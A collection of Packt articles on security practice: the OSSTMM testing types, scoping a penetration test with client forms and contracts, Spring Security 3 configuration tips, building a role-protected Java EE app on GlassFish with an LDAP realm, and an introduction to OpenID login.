- Open Source Security Testing Methodology Manual (OSSTMM)
- Information Systems Security Assessment Framework (ISSAF)
- Open Web Application Security Project (OWASP) Top Ten
- Web Application Security Consortium Threat Classification (WASC-TC)

All of these testing frameworks and methodologies will assist security professionals in choosing the best strategy to fit their client's requirements and in qualifying a suitable testing prototype. The first two provide general guidelines and methods for security testing of almost any information asset. The last two mainly deal with the assessment of the application security domain. It is, however, important to note that security in itself is an ongoing process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before undertaking any of the above testing methods, the integrity of the target environment should be assured. Additionally, adopting any single methodology does not necessarily provide a complete picture of the risk assessment process.
Hence, it is left up to the security auditor to select the best strategy that can address the target testing criteria and remain consistent with the network or application environment. There are many security testing methodologies that claim to be perfect at finding all security issues, but choosing the best one still requires a careful selection process, under which one can determine the accountability, cost, and effectiveness of the assessment at an optimum level. Determining the right assessment strategy depends on several factors, including the technical details provided about the target environment, resource availability, the pentester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and devoting unwanted resources to a security testing process can put the whole business economy in danger.

Open Source Security Testing Methodology Manual (OSSTMM)

The OSSTMM is a recognized international standard for security testing and analysis, used by many organizations in their day-to-day assessment cycle. It is based purely on the scientific method, which assists in quantifying operational security and its cost requirements in relation to the business objectives. From a technical perspective, its methodology is divided into four key groups: scope, channel, index, and vector. The scope defines a process for collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with these assets, which can be physical, spectrum, or communication. Each of these channels depicts a unique set of security components that have to be tested and verified during the assessment period. These components comprise physical security, human psychology, data networks, wireless communication media, and telecommunications. The index is a method of classifying the target assets by their particular identifiers, such as MAC address or IP address. Finally, a vector concludes the direction from which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap for evaluating the target environment thoroughly and is known as the audit scope.

There are different forms of security testing classified under the OSSTMM methodology, organized into six standard security test types:

- Blind: Blind testing does not require any prior knowledge of the target system, but the target is informed before the execution of the audit scope. Ethical hacking and war gaming are examples of blind testing. This kind of testing is widely accepted because of its ethical vision of informing the target in advance.
- Double blind: In double blind testing, the auditor does not require any knowledge of the target system, nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. Most security assessments today are carried out using this strategy, posing a real challenge for auditors to select the best-of-breed tools and techniques to achieve the required goal.
- Gray box: In gray box testing, the auditor holds limited knowledge of the target system and the target is informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing.
- Double gray box: Double gray box testing works in a similar way to gray box testing, except that the time frame for the audit is defined and no channels or vectors are tested. A white-box audit is an example of double gray box testing.
- Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system, and the target is notified in advance, before the test is executed. Tandem testing is conducted thoroughly. Crystal box and in-house audits are examples of tandem testing.
- Reversal: In reversal testing, the auditor holds full knowledge of the target system and the target is never informed of how and when the test will be conducted. Red-teaming is an example of reversal testing.

Which OSSTMM test type follows the rules of penetration testing? Double blind testing.

The technical assessment framework provided by OSSTMM is flexible and capable of deriving certain test cases, which are logically divided into five security components across the three consecutive channels mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during, and after the test, and how to interpret and correlate the final results.

Capturing the current state of protection of a target system using security metrics is considerably useful and invaluable. The OSSTMM methodology expresses this in the form of RAVs (Risk Assessment Values). The basic function of a RAV is to analyze the test results and compute the actual security value based on three factors: operational security, loss controls, and limitations. This final security value is known as the RAV score. Using the RAV score, an auditor can easily extract and define milestones, based on the current security posture, to accomplish better protection. From a business perspective, RAVs can optimize the amount of investment required for security and may help in the justification of better available solutions.

Key features and benefits

Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides an accurate measurement of security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audits, and vulnerability assessments. It ensures that the assessment is carried out thoroughly and that the results can be aggregated in a consistent, quantifiable, and reliable manner. The methodology itself follows four individually connected phases, namely the definition phase, the information phase, the regulatory phase, and the controls test phase, each of which obtains, assesses, and verifies information regarding the target environment. Evaluating security metrics can be achieved using the RAV method: the RAV calculates the actual security value based on operational security, loss controls, and limitations, and the resulting RAV score represents the current state of target security. Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management as well as the technical team for reviewing the testing objectives, risk assessment values, and the output from each test phase.
The methodology is regularly updated with new trends in security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislation. Additionally, a certified audit can also be eligible for accreditation from ISECOM (the Institute for Security and Open Methodologies) directly.


BackTrack 4: Target scoping

Packt
15 Apr 2011
9 min read
What is target scoping?

Target scoping is defined as an empirical process for gathering target assessment requirements and characterizing each of their parameters to generate a test plan, limitations, business objectives, and time schedule. This process plays an important role in defining clear objectives for any kind of security assessment. By determining these key objectives one can easily draw a practical roadmap of what will be tested, how it should be tested, what resources will be allocated, what limitations will be applied, what business objectives will be achieved, and how the test project will be planned and scheduled. Thus, we have combined all of these elements and presented them in a formalized scope process to achieve the required goal. The following are the key concepts discussed in this article:

- Gathering client requirements deals with accumulating information about the target environment through verbal or written communication.
- Preparing the test plan depends on different sets of variables. These may include shaping the actual requirements into a structured testing process, legal agreements, cost analysis, and resource allocation.
- Profiling test boundaries determines the limitations associated with the penetration testing assignment. These can be limitations of technology or knowledge, or a formal restriction on the client's IT environment.
- Defining business objectives is a process of aligning the business view with the technical objectives of the penetration testing program.
- Project management and scheduling directs every other step of the penetration testing process with a proper timeline for test execution. This can be achieved using a number of advanced project management tools.

It is highly recommended to follow the scope process in order to ensure test consistency and a greater probability of success. Additionally, this process can be adjusted according to the given situation and test factors. Without such a process, there will be a greater chance of failure, as the requirements gathered will have no proper definitions and procedures to follow. This can put the whole penetration testing project in danger and may result in unexpected business interruption. Paying special attention to the penetration testing process at this stage makes an excellent contribution to the rest of the test phases and clarifies the perspectives of both the technical and management areas. The key is to acquire as much information beforehand as possible from the client to formulate a strategic path that reflects the multiple aspects of penetration testing. These may include negotiable legal terms, the contractual agreement, resource allocation, test limitations, core competencies, infrastructure information, timescales, and rules of engagement. As a part of best practices, the scope process addresses each of the attributes necessary to kickstart the penetration testing project in a professional manner. Each step constitutes unique information that is aligned in a logical order to pursue the test execution successfully. Remember, the more information that is gathered and managed properly, the easier it will be for both the client and the penetration testing consultant to understand the process of testing. This also allows any legal matters to be resolved at an early stage. Hence, we will explain each of these steps in more detail in the following sections.
Gathering client requirements
This step provides a generic guideline that can be drawn up as a questionnaire to elicit all of the information about the target infrastructure from a client. A client is any subject who is legally and commercially bound to the target organization. It is critical to the success of the penetration testing project to identify all internal and external stakeholders at an early stage and to analyze their levels of interest, expectations, importance, and influence. A strategy can then be developed for approaching each stakeholder with their requirements and involvement in the penetration testing project, in order to maximize positive influences and mitigate potential negative impacts. It is solely the duty of the penetration tester to verify the identity of the contracting party before taking any further steps. The basic purpose of gathering client requirements is to open a true and authentic channel through which the pentester can obtain any information that may be necessary for the testing process. Once the test requirements have been identified, they should be validated by the client in order to remove any misleading information; this ensures that the resulting test plan is consistent and complete. We have listed some commonly asked questions that can be used in a conventional customer requirements form and a deliverables assessment form. Note that this list can be extended or shortened according to the client's goal, and that the client must know the target environment well enough to answer.
Customer requirements form
- Company information such as company name, address, website, contact person details, e-mail address, and telephone number.
- What are your key objectives behind the penetration testing project?
- Determining the penetration test type (with or without specific criteria):
  - Black-box (external) testing or white-box (internal) testing
  - Informed or uninformed testing
  - Social engineering included or excluded
  - Investigating employees' background information
  - Adopting an employee's fake identity
  - Denial of service included or excluded
  - Penetrating business partner systems
- How many servers, workstations, and network devices need to be tested?
- Which operating system technologies are supported by your infrastructure?
- Which network devices need to be tested: firewalls, routers, switches, modems, load balancers, IDS, IPS, or any other appliance?
- Is there a disaster recovery plan in place? If yes, who is managing it?
- Are any security administrators currently managing your network?
- Is there any specific requirement to comply with industry standards? If yes, please list them.
- Who will be the point of contact for this project?
- What is the timeline allocated for this project, in weeks or days?
- What is your budget for this project?
- List any other requirements as necessary.
Deliverables assessment form
- What types of reports are expected: executive reports, technical assessment reports, or developer reports?
- In which format do you want the report to be delivered: PDF, HTML, or DOC?
- How should the report be submitted: by e-mail or printed?
- Who is responsible for receiving these reports: an employee, a shareholder, or a stakeholder?
Using such a concise and comprehensive inquiry form makes it easy to extract the customer requirements and shape the test plan accordingly.
Preparing the test plan
Once the requirements have been gathered and verified by the client, it is time to draw up a formal test plan that reflects all of those requirements, in addition to other necessary information on the legal and commercial grounds of the testing process. The key variables involved in preparing a test plan are a structured testing process, resource allocation, cost analysis, a non-disclosure agreement, a penetration testing contract, and rules of engagement. Each of these areas is addressed briefly below:
- Structured testing process: After analyzing the details provided by the customer, it may be important to restructure the BackTrack testing methodology. For instance, if the social engineering service is excluded, we would remove it from our formal testing process. This practice is sometimes known as test process validation; it is a repetitive task that has to be revisited whenever there is a change in client requirements. Any unnecessary steps involved during test execution may violate the organization's policies and incur serious penalties. Additionally, the test type drives a number of changes to the test process: white-box testing, for example, does not require the information gathering and target discovery phases, because the auditor is already aware of the internal infrastructure.
- Resource allocation: Determining the expert knowledge required to achieve the completeness of a test is a substantial task, and assigning a skilled penetration tester to a given task can result in a better security assessment. For instance, application penetration testing requires a dedicated application security tester. This activity plays a significant role in the success of a penetration testing assignment.
- Cost analysis: The cost of penetration testing depends on several factors: the number of days allocated to fulfill the scope of the project, additional service requirements such as social engineering and physical security assessment, and the expert knowledge required to assess the specific technology. From an industry viewpoint, the cost should combine a qualitative and a quantitative value.
- Non-disclosure agreement (NDA): Before starting the test process, it is necessary to sign an agreement that reflects the interests of both parties, the client and the penetration tester. Such a mutual non-disclosure agreement spells out the terms and conditions under which the test is aligned, and the penetration tester must comply with them throughout the test process. Violating any single term of the agreement can result in serious penalties or permanent exclusion from the job.
- Penetration testing contract: There is always a need for a legal contract covering all of the technical matters between the client and the penetration tester. Such a contract focuses on which testing services are being offered, their main objectives, how they will be conducted, the payment terms, and the confidentiality of the whole project.
- Rules of engagement: The process of penetration testing can be invasive, so it requires a clear understanding of what the assessment demands, what support will be provided by the client, and what type of potential impact or effect each assessment technique may have. Moreover, the tools used in the penetration testing process should clearly state their purpose so that the tester can use them accordingly. The rules of engagement define all of these statements in detail to address the technical criteria that should be followed during test execution.
By preparing each of these subparts of the test plan, you ensure a consistent view of the penetration testing process. This provides the penetration tester with more specific assessment details processed from the client requirements. It is always recommended to prepare a test plan checklist, which can be used to verify the assessment criteria and their underlying terms with the contracting party.

Spring Security 3: Tips and Tricks

Packt
28 Feb 2011
6 min read
Spring Security 3: make your web applications impenetrable; implement authentication and authorization of users; integrate Spring Security 3 with common external security providers; packed full of concrete, simple, and concise examples.

Changing the default login URL
Tip: It's a good idea to change the default value of the spring_security_login page URL. Not only is the resulting URL more user- and search-engine friendly, it also disguises the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.

Evaluating authorization rules
Tip: For any given URL request, Spring Security evaluates authorization rules in top-to-bottom order, and the first rule matching the URL pattern is applied. Typically, this means that your authorization rules should be ordered from most specific to least specific. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top-to-bottom order, and you can easily find the correct rule in any scenario. A configuration sketch illustrating these first two tips follows below.

Using the JSTL URL tag to handle relative URLs
Tip: Use the JSTL core library's url tag to ensure that the URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag resolves URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques for this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!

Modifying username or password and the remember me feature
Tip: As you may have anticipated, if the user changes their username or password, any remember me tokens set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.

Configuration of remember me session cookies
Tip: If token-validity-seconds is set to -1, the login cookie is set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of two weeks. Don't confuse this with the cookie that stores your user's session ID; they're two different things with similar names!

Checking full authentication without expressions
Tip: If your application does not use SpEL expressions for access declarations, you can still check whether the user is fully authenticated by using the IS_AUTHENTICATED_FULLY access rule (for example, .access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.
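The first two tips can be sketched in a single security namespace snippet. This is a minimal illustration only, not code from the book: the /signin URL, the URL patterns, and the role names are placeholder assumptions.

<http auto-config="true">
    <!-- rules are evaluated top to bottom: most specific patterns come first -->
    <intercept-url pattern="/admin/**" access="ROLE_ADMIN"/>
    <intercept-url pattern="/account/**" access="ROLE_USER"/>
    <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY"/>
    <!-- a custom login page disguises the default spring_security_login URL;
         the /signin page itself must remain reachable by anonymous users -->
    <form-login login-page="/signin"/>
</http>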
Debugging remember me cookies
Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all: Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox; browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!).

Making effective use of an in-memory UserDetailsService
Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.

Storing sensitive information
Tip: Many guidelines that apply to the storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).

Annotations at the class level
Tip: Be aware that the method-level security annotations can also be applied at the class level. Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate the specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.

Authenticating the user against LDAP
Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService if you intend to authenticate the user against LDAP itself!

Externalize URLs and environment-dependent settings
Tip: Coding URLs into Spring configuration files is a bad idea. Typically, the storage of, and consistent reference to, URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for the reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice.

Summary
In this article we took a look at some tips and tricks for Spring Security.
Further resources on this subject:
- Spring Security 3 [Book]
- Migration to Spring Security 3 [Article]
- Opening up to OpenID with Spring Security [Article]
- Spring Security: Configuring Secure Passwords [Article]

Designing Secure Java EE Applications in GlassFish

Packt
31 May 2010
2 min read
Security is an orthogonal concern for an application, and we should assess it right from the start by reviewing the analysis we receive from business and functional analysts. Assessing the security requirements results in understanding the functionalities we need to include in our architecture to deliver a secure application covering the necessary requirements. Security necessities can cover a wide range of requirements, varying from simple authentication to several sub-systems, such as an identity and access management system and transport security, which can include encrypting data as well. In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the series, we will cover the following topics:
- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container
Developing Secure Java EE Applications in GlassFish is the second part of this article series.
Understanding the sample application
The sample application that we are going to develop converts different length measurement units into each other: our application converts meters to centimeters, millimeters, and inches. The application also stores usage statistics for later use. Guest users who prefer not to log in can only use meter-to-centimeter conversion; any company employee can use meter-to-centimeter and meter-to-millimeter conversion; and any of the company's managers can access meter-to-inch conversion in addition to the two other conversion functionalities. We should show a custom login page to comply with the site-wide look and feel. No encryption is required for communication between clients and our application, but we need to make sure that no one can intercept and steal the usernames and passwords provided by members. All members' identification information is stored in the company-wide directory server. At a high level, the application consists of a login action and three conversion actions; users can access some of them after logging in, and some without logging in.

Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the series, we will cover the following topics:
- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container
Read Designing Secure Java EE Applications in GlassFish here.
Developing the Presentation layer
The Presentation layer is the closest layer to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed below; the JSP files are categorized into different directories to make the security description easier.
- index.jsp: the application entry point; it has links to the functional JSP pages such as toMilli.jsp.
- auth/login.html: presents a custom login page to users when they try to access a restricted resource; placed inside the auth directory of the web application.
- auth/logout.jsp: logs users out of the system after their work is finished.
- auth/loginError.html: unsuccessful login attempts redirect users to this page; placed inside the auth directory of the web application.
- jsp/toInch.jsp: converts a given length to inches; only available to managers.
- jsp/toMilli.jsp: converts a given length to millimeters; available to any employee.
- jsp/toCenti.jsp: converts a given length to centimeters; available to everyone.
- Converter servlet: receives the request, invokes the session bean to perform the conversion, and returns the value to the user.
- auth/accessRestricted.html: an error page for HTTP error 401, which occurs when authorization fails.
- Deployment descriptors: the descriptors in which we describe the security constraints over the resources we want to protect.
Now that our application's building blocks are identified, we can start implementing them to complete the application. Before anything else, let's implement the JSP files that provide the conversion GUI.
Implementing the conversion GUI
In our application, the index.jsp file acts as a gateway to the entire system and is shown in the following listing:

<html>
<head><title>Select A conversion</title></head>
<body><h1>Select A conversion</h1>
<a href="auth/login.html">Login</a> <br/>
<a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/>
<a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/>
<a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/>
<a href="auth/logout.jsp">Logout</a>
</body>
</html>

Implementing the Converter servlet
The Converter servlet receives the conversion value and method from the JSP files and calls the corresponding method of a session bean to perform the actual conversion.
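The session bean itself is not shown in this excerpt. Purely as a hypothetical sketch of what it could look like, here is one way to express the access rules with the standard Java EE security annotations, using the role names defined later in the deployment descriptors; the method names (including the toMilimeter spelling) match the servlet listing that follows, while the bean body is an assumption for illustration:

import javax.annotation.security.DeclareRoles;
import javax.annotation.security.PermitAll;
import javax.annotation.security.RolesAllowed;
import javax.ejb.Stateless;

@Stateless
@DeclareRoles({"employee_role", "manager_role"})
public class ConversionBean implements ConversionLocal {

    // open to everyone, including unauthenticated guests
    @PermitAll
    public int toCentimeter(int meter) {
        return meter * 100;
    }

    // any authenticated employee or manager
    @RolesAllowed({"employee_role", "manager_role"})
    public int toMilimeter(int meter) {
        return meter * 1000;
    }

    // managers only; other callers trigger javax.ejb.AccessLocalException
    @RolesAllowed("manager_role")
    public int toInch(int meter) {
        return Math.round(meter * 39.37f);
    }
}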
The following listing shows the Converter servlet content:

@WebServlet(name="Converter", urlPatterns={"/Converter"})
public class Converter extends HttpServlet {

    @EJB
    private ConversionLocal conversionBean;

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            int valueToConvert = Integer.parseInt(request.getParameter("meterValue"));
            String method = request.getParameter("method");
            out.print("<hr/> <center><h2>Conversion Result is: ");
            if (method.equalsIgnoreCase("toMilli")) {
                out.print(conversionBean.toMilimeter(valueToConvert));
            } else if (method.equalsIgnoreCase("toCenti")) {
                out.print(conversionBean.toCentimeter(valueToConvert));
            } else if (method.equalsIgnoreCase("toInch")) {
                out.print(conversionBean.toInch(valueToConvert));
            }
            out.print("</h2></center>");
        } catch (AccessLocalException ale) {
            response.sendError(401);
        } finally {
            out.close();
        }
    }
}

Starting from the beginning, we use annotations to configure the servlet name and mapping instead of the deployment descriptor. We then use dependency injection to inject an instance of the Conversion session bean into the servlet, and decide which of its methods to invoke based on the conversion type that the calling JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. Each servlet needs its description elements to be provided either in the deployment descriptor or, as here, through annotations. Implementing the conversion JSP files is the last step in implementing the functional pieces. The following listing shows the content of the toMilli.jsp file:

<html>
<head><title>Convert To Millimeter</title></head>
<body><h1>Convert To Millimeter</h1>
<form method="POST" action="../Converter">Enter Value to Convert:
<input name="meterValue">
<input type="hidden" name="method" value="toMilli">
<input type="submit" value="Submit" />
</form>
</body>
</html>

The toCenti.jsp and toInch.jsp files look the same, except for the descriptive content and the value of the hidden method parameter, which is toCenti and toInch respectively. Now we are finished with the functional parts of the Web layer; we just need to implement the required GUI for the security measures.
Implementing the authentication frontend
For the authentication, we should use a custom login page to have a unified look and feel across the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page, and an error page to which users are redirected in case authentication fails. Implementing authentication requires us to go through the following steps:
- Implementing login.html and loginError.html
- Including the security description in web.xml and sun-web.xml or sun-application.xml
Implementing a login page
In FORM authentication we implement our own login form to collect the username and password, and we then pass them to the container for authentication.
We should let the container know which field is the username and which field is the password by using standard names for these fields: the username field is j_username, and the password field is j_password. To pass these fields to the container for authentication, we should use j_security_check as the form action. When we post to j_security_check, the servlet container takes over and authenticates the included j_username and j_password against the configured realm. The listing below shows the login.html content:

<form method="POST" action="j_security_check">
Username: <input type="text" name="j_username"><br />
Password: <input type="password" name="j_password"><br />
<br />
<input type="submit" value="Login">
<input type="reset" value="Reset">
</form>

This login page is displayed whenever an unauthenticated user tries to access a restricted resource.
Implementing a logout page
A user may need to log out of our system after they are finished using it, so we need to implement a logout page. The following listing shows the logout.jsp file:

<% session.invalidate(); %>
<body>
<center>
<h1>Logout</h1>
You have successfully logged out.
</center>
</body>

Implementing a login error page
Now we should implement loginError.html, an authentication error page to inform the user about an authentication failure:

<html>
<body>
<h2>A Login Error Occurred</h2>
Please click <a href="login.html">here</a> for another try.
</body>
</html>

Implementing an access restricted page
When an authenticated user without the required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users, we should either map this exception to an error page, or catch the exception, log the event for auditing purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web page with a meaningful description using the web.xml deployment descriptor; you will see which configuration elements do this mapping shortly. The following snippet shows the accessRestricted.html file:

<body>
<center>
<p>You need to login to access the requested resource. To login go to <a href="auth/login.html">Login Page</a></p></center>
</body>

Configuring deployment descriptors
So far we have implemented the files required for FORM-based authentication, and we only need to include the necessary descriptions in the web.xml file. Looking back at the application requirement definitions, anyone can use the meter-to-centimeter conversion functionality, while every other functionality requires the user to log in. We use three different JSP pages for the different types of conversion. We do not need any constraint on toCenti.jsp, and therefore we do not need to include any definition for it. Per the application description, any employee can access the toMilli.jsp page.
Defining the security constraint for this page is shown in the following listing:

<security-constraint>
    <display-name>You should be an employee</display-name>
    <web-resource-collection>
        <web-resource-name>all</web-resource-name>
        <url-pattern>/jsp/toMilli.jsp</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
        <http-method>DELETE</http-method>
    </web-resource-collection>
    <auth-constraint>
        <role-name>employee_role</role-name>
    </auth-constraint>
</security-constraint>

We should put enough constraints on the toInch.jsp page so that only managers can access it. The listing below shows the security constraint definition for this page:

<security-constraint>
    <display-name>You should be a manager</display-name>
    <web-resource-collection>
        <web-resource-name>Inch</web-resource-name>
        <url-pattern>/jsp/toInch.jsp</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
        <role-name>manager_role</role-name>
    </auth-constraint>
</security-constraint>

Finally, we need to define every role we used in the deployment descriptor. The following snippet shows how we define these roles in web.xml:

<security-role>
    <role-name>manager_role</role-name>
</security-role>
<security-role>
    <role-name>employee_role</role-name>
</security-role>

Looking back at the application requirements, we need to define a data constraint to ensure that the usernames and passwords provided by our users are safe during transmission. The following listing shows how we can define the data constraint on the login.html page:

<security-constraint>
    <display-name>Login page Protection</display-name>
    <web-resource-collection>
        <web-resource-name>Authentication</web-resource-name>
        <url-pattern>/auth/login.html</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
    </web-resource-collection>
    <user-data-constraint>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
</security-constraint>

One more step and our web.xml file will be complete: defining an error page for the HTTP 401 error code. This error code means that the application server is unable to perform the requested action due to a negative authorization result. The following snippet shows the required elements to define this error page:

<error-page>
    <error-code>401</error-code>
    <location>/auth/accessRestricted.html</location>
</error-page>

Now that we are finished with declaring the security, we can create the conversion pages, and afterwards we can start on the Business layer and its security requirements.
Specifying the security realm
Up to this point we have defined all the constraints that our application requires, but we still need to follow one more step to complete the application's security configuration: specifying the security realm and authentication method. We should specify FORM authentication and, per the application description, authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm. We need to import a new LDIF file into our LDAP server, containing the group and user definitions required for this article. To import the file we can use the following command, assuming that you downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and extracted it.
import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile

The following list shows the users and groups defined inside the users.ldif file (username/password, followed by group membership):
- james/james: manager, employee
- meera/meera: employee
We used OpenDS for the realm data storage; it holds two users, one in the employee group only, and the other in both the employee and manager groups. To configure the authentication realm we need to include the following snippet in the web.xml file:

<login-config>
    <auth-method>FORM</auth-method>
    <realm-name>LDAPRealm</realm-name>
    <form-login-config>
        <form-login-page>/auth/login.html</form-login-page>
        <form-error-page>/auth/loginError.html</form-error-page>
    </form-login-config>
</login-config>

If we look at our Web and EJB modules as separate modules, we must specify the role mappings for each module separately using the GlassFish deployment descriptors sun-web.xml and sun-ejb-jar.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file, so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use that definition. The following listing shows the role and group mappings in the sun-application.xml file:

<sun-application>
    <security-role-mapping>
        <role-name>manager_role</role-name>
        <group-name>manager</group-name>
    </security-role-mapping>
    <security-role-mapping>
        <role-name>employee_role</role-name>
        <group-name>employee</group-name>
    </security-role-mapping>
    <realm>LDAPRealm</realm>
</sun-application>

The security-role-mapping element used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You should have noticed that we have a realm element in addition to the role mapping elements; we can use the realm element of sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately.
Summary
In this article series, we covered the following topics:
- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container
We learnt how to develop a secure Java EE application with all standard modules, including Web, EJB, and application client modules.

Opening up to OpenID with Spring Security

Packt
27 May 2010
7 min read
(For more resources on Spring, see here.)
The promising world of OpenID
The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with which the user wants to interact. In concept, this type of login through a trusted third party has existed for a long time in many different forms (Microsoft Passport, for example, was one of the more notable central login services on the web for some time). OpenID's distinct advantage is that an OpenID provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which is why there is currently a diverse population of public providers running the same protocol. This is an excellent recipe for healthy competition, and it is good for consumer choice. At a high level, the relationship between a site integrating OpenID during the login process and the OpenID providers works as follows: the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by his OpenID provider and is used to uniquely identify both the user and the OpenID provider. This is commonly done either by prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or by appending a unique identifier to the URI of the OpenID provider (for example, https://me.yahoo.com/jamesgosling). Both methods clearly identify the OpenID provider (via the domain name) and the unique user identifier.
Don't trust OpenID unequivocally! There is a fundamental assumption here that can fool users of the system. It is possible for us to sign up for an OpenID that makes it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) he is the authentic person, without requiring additional forms of identification. Thinking about it another way: if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID?
The OpenID-enabled application then redirects the user to the OpenID provider, where the user presents his credentials to the provider, which is responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now!
Signing up for an OpenID
In order to get the full value of the exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, and MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page.
To get full value out of the exercises in this article, we recommend you have accounts with at least:
